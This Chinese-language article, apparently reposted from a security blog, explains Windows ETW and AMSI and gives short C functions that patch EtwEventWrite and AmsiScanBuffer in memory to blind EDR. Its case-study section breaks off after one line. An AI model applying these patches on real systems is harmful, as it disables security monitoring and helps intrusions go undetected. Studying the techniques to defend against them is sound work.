ETW与AMSI对抗——致盲EDR的关键技术

admin
admin
admin
0
文章
0
评论
2026-04-04 05:36:07 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文深入剖析ETW与AMSI作为EDR关键数据源的技术原理,重点阐述通过内存补丁技术对抗EDR监控的方法。核心内容包括:ETW通过修补ntdll!EtwEventWrite等函数阻止进程、文件、网络事件记录;AMSI通过修改amsi!AmsiScanBuffer等函数绕过脚本扫描。文章提供完整的C语言实现代码,并给出实战案例,为红队操作提供有效的技术实现路径。 综合评分: 85 文章分类: 免杀,红队,终端安全,内网渗透,安全工具

cover_image

ETW与AMSI对抗——致盲EDR的关键技术

原创

pandazhengzheng pandazhengzheng

安全分析与研究

2026年4月2日 08:31 广东

一、前言概述

ETW和AMSI是EDR的重要数据源,Patch它们可以有效地致盲EDR,本课将深入介绍ETW和AMSI的原理以及对抗技术。

二、相关内容

2.1 ETW(Event Tracing for Windows)

原理:ETW是Windows提供的高性能事件跟踪机制,EDR使用ETW记录系统事件。

关键ETW提供者:

  • Microsoft-Windows-Kernel-Process:进程创建/终止
  • Microsoft-Windows-Kernel-File:文件操作
  • Microsoft-Windows-Kernel-Network:网络连接
  • Microsoft-Windows-PowerShell:PowerShell命令

2.2 Patch ETW技术

原理:通过修补ETW相关函数,阻止EDR记录事件。

目标函数:

  • ntdll!EtwEventWrite
  • ntdll!EtwEventWriteFull

实现方法:

void PatchETW() {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    LPVOID pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");

    DWORD oldProtect;
    VirtualProtect(pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);

    BYTE patch = 0xC3; // ret
    memcpy(pEtwEventWrite, &patch, 1);

    VirtualProtect(pEtwEventWrite, 1, oldProtect, &oldProtect);
}

2.3 AMSI(Antimalware Scan Interface)

原理:AMSI是Windows提供的反恶意软件扫描接口,用于扫描脚本内容。

关键AMSI函数:

  • AmsiInitialize
  • AmsiOpenSession
  • AmsiScanBuffer
  • AmsiScanString

2.4 Patch AMSI技术

原理:通过修补AMSI相关函数,使恶意脚本不被扫描。

目标函数:

  • amsi!AmsiScanBuffer
  • amsi!AmsiScanString

实现方法:

void PatchAMSI() {
    HMODULE hAmsi = LoadLibraryA("amsi.dll");
    LPVOID pAmsiScanBuffer = GetProcAddress(hAmsi, "AmsiScanBuffer");

    DWORD oldProtect;
    VirtualProtect(pAmsiScanBuffer, 6, PAGE_EXECUTE_READWRITE, &oldProtect);

    BYTE patch[] = { 0x31, 0xC0, 0xC3 }; // xor eax, eax; ret
    memcpy(pAmsiScanBuffer, patch, 3);

    VirtualProtect(pAmsiScanBuffer, 6, oldProtect, &oldProtect);
}

2.5 实战案例分析

2.5.1 案例1:Patch ETW绕过EDR监控

攻击场景:攻击者需要执行恶意操作,但EDR通过ETW监控所有系统事件。

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全分析与研究 pandazhengzheng pandazhengzheng《ETW与AMSI对抗——致盲EDR的关键技术》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0